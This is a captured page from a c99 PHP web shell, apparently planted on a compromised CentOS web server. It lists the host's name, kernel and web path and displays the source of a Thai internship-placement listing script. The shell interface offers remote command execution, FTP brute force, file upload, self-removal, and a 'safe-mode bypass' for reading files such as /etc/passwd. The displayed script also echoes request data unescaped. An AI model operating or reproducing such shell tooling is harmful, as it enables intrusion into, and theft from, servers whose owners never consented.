!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/eregis/_admin/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     epTableCT.php (5.08 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "../class/clsrg_ExternalPlace.php";
include_once 
"../class/clsrg_MainExternalPlace.php";
include_once 
"../class/clsrg_SubExternalPlace.php";

$conn = new Connection();

$oEp = new rg_ExternalPlace();
$oMep = new rg_MainExternalPlace();
$oSep = new rg_SubExternalPlace();
?>
<html>
<head>
<title>ตารางสถานที่ฝึกงาน</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<style>
<!--
A:link {text-decoration: none }
A:visited {text-decoration: none}
A:hover {text-decoration: none; font-weight: underline}
-->
</style>

<!---------------------------------------Begin JavaScript---------------------------------------->
<script language="JavaScript">
    function ReturnValue(epMepId, epSepId, mepName, sepName)
    {
        window.opener.document.pc.ctEpMepId.value = epMepId;
        window.opener.document.pc.ctEpSepId.value = epSepId;
        window.opener.document.pc.mepName.value = mepName;
        window.opener.document.pc.sepName.value = sepName;
        window.close();
    }
</script>
</head>
<body bgcolor="#FFFFFF">
<table width="100%" border="0" cellspacing="1" cellpadding="1">
    <tr>
        <td><font size="2"><b>สถานที่ฝึกงานหลัก</b></font>
        <select name="epMepIdSearch" onChange="location.href = '<?php echo $_SERVER['PHP_SELF']?>?epMepIdSearch='+encodeURI(options[selectedIndex].value)">
            <option value="">--เลือกสถานที่ฝึกงานหลัก--</option>
<?php
            $oEp
->RSrg_ExternalPlaceGroupMepId();
            while(
$oEp->GetRecord()) {
                
$oMep->SearchByKey($oEp->epMepId);
                
$oMep->GetRecord();
?>
            <option value="<?php echo $oEp->epMepId;?><?php echo ($oEp->epMepId==$epMepIdSearch) ? 'selected' '';?>><?php echo $oMep->mepName;?></option>
<?php
            
}
?>
        </select></td>
    </tr>
    <tr>
        <td><font size="2"><b>สถานที่ฝึกงานย่อย</b></font>
        <select name="epSepIdSearch" onChange="location.href = '<?php echo $_SERVER['PHP_SELF']?>?epSepIdSearch='+encodeURI(options[selectedIndex].value)">
            <option value="">---เลือกสถานที่ฝึกงานย่อย---</option>
<?php
            $oEp
->RSrg_ExternalPlaceGroupSepId();
            while(
$oEp->GetRecord()) {
                
$oSep->SearchByKey($oEp->epSepId);
                
$oSep->GetRecord();
?>
            <option value="<?php echo $oEp->epSepId;?><?php echo ($oEp->epSepId==$epSepIdSearch) ? 'selected' '';?>><?php echo $oSep->sepName;?></option>
<?php
            
}
?>
        </select></td>
    </tr>
</table>
<table width="100%" border="0" cellspacing="1" cellpadding="1" bgcolor="silver">
    <tr bgcolor="#0066CC"> 
        <td width="12%" height="22" align="center"><font size="2" color="#FFFFFF"><b>ลำดับที่</b></font></td>
        <td width="58%" align="center"><font size="2" color="#FFFFFF"><b>สถานที่ฝึกงานหลัก</b></font></td>
        <td width="30%" align="center"><font size="2" color="#FFFFFF"><b>สถานที่ฝึกงานย่อย</b></font></td>
    </tr>
<?php
    
if(!$epMepIdSearch && !$epSepIdSearch)
        
$oEp->RSrg_ExternalPlace();
    else
        
$oEp->RSrg_ExternalPlaceByMepIdOrSepId($epMepIdSearch$epSepIdSearch);
    
$numRow $oEp->NumRow();
    
$page_size 10;
    
$total_page = (int)($numRow/$page_size);
    if((
$numRow%$page_size) != 0)
        
$total_page++;

    if(isset(
$page_id))
        
$start $page_size*($page_id-1);
    else {
        
$page_id 1;
        
$start 0;
    }

    
$i 0;
    if(!
$epMepIdSearch && !$epSepIdSearch)
        
$oEp->RSrg_ExternalPlaceOrderMepNameSepNameLimit($start$page_size);
    else
        
$oEp->RSrg_ExternalPlaceByMepIdOrSepIdOrderMepNameSepNameLimit($epMepIdSearch$epSepIdSearch$start$page_size);
    while(
$oEp->GetRecord()) {
        
$oMep->SearchByKey($oEp->epMepId);
        
$oMep->GetRecord();
        
$oSep->SearchByKey($oEp->epSepId);
        
$oSep->GetRecord();
?>
    <tr bgcolor="#FFFFFF"> 
        <td height="22" align="center"><font size="2" style="CURSOR: hand" onClick='ReturnValue("<?php echo $oEp->epMepId;?>","<?php echo $oEp->epSepId;?>","<?php echo $oMep->mepName;?>","<?php echo $oSep->sepName;?>")'><?php echo $start+$i+1;?></font></td>
        <td><font size="2" style="CURSOR: hand" onClick='ReturnValue("<?php echo $oEp->epMepId;?>","<?php echo $oEp->epSepId;?>","<?php echo $oMep->mepName;?>","<?php echo $oSep->sepName;?>")'><?php echo $oMep->mepName;?></font></td>
        <td><font size="2" style="CURSOR: hand" onClick='ReturnValue("<?php echo $oEp->epMepId;?>","<?php echo $oEp->epSepId;?>","<?php echo $oMep->mepName;?>","<?php echo $oSep->sepName;?>")'><?php echo $oSep->sepName;?></font></td>
    </tr>
<?php
        $i
++;
    }
    
    if(
$i == 0) {
?>
    <tr bgcolor="#FFFFFF">
        <td colspan="3" align="center"><font size="2" color="#FF0000">** ไม่ปรากฏรายการดังกล่าวในฐานข้อมูล **</font></td>
    </tr>
<?php
    
}
?>
</table>
<table width="100%" border="0" cellspacing="1" cellpadding="1" bgcolor="silver">
    <tr>
        <td><font size="2">หน้า-&gt;
<?php
        
for ($num=1$num<=$total_page$num++) {    
            if(
$num == $page_id)
                echo 
$num." ";
            else {
?>
                <a href="epTableCT.php?page_id=<?php echo $num;?>&amp;epMepIdSearch=<?php echo $epMepIdSearch;?>&amp;epSepIdSearch=<?php echo $epSepIdSearch;?>"><?php echo '[ '.$num.' ]';?></a> 
<?php
            
}
        }
?>
        </font></td>
        <td align="right"><font size="2">รวม <?php echo $numRow;?> รายการ</font></td>
    </tr>
</table>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.017 ]--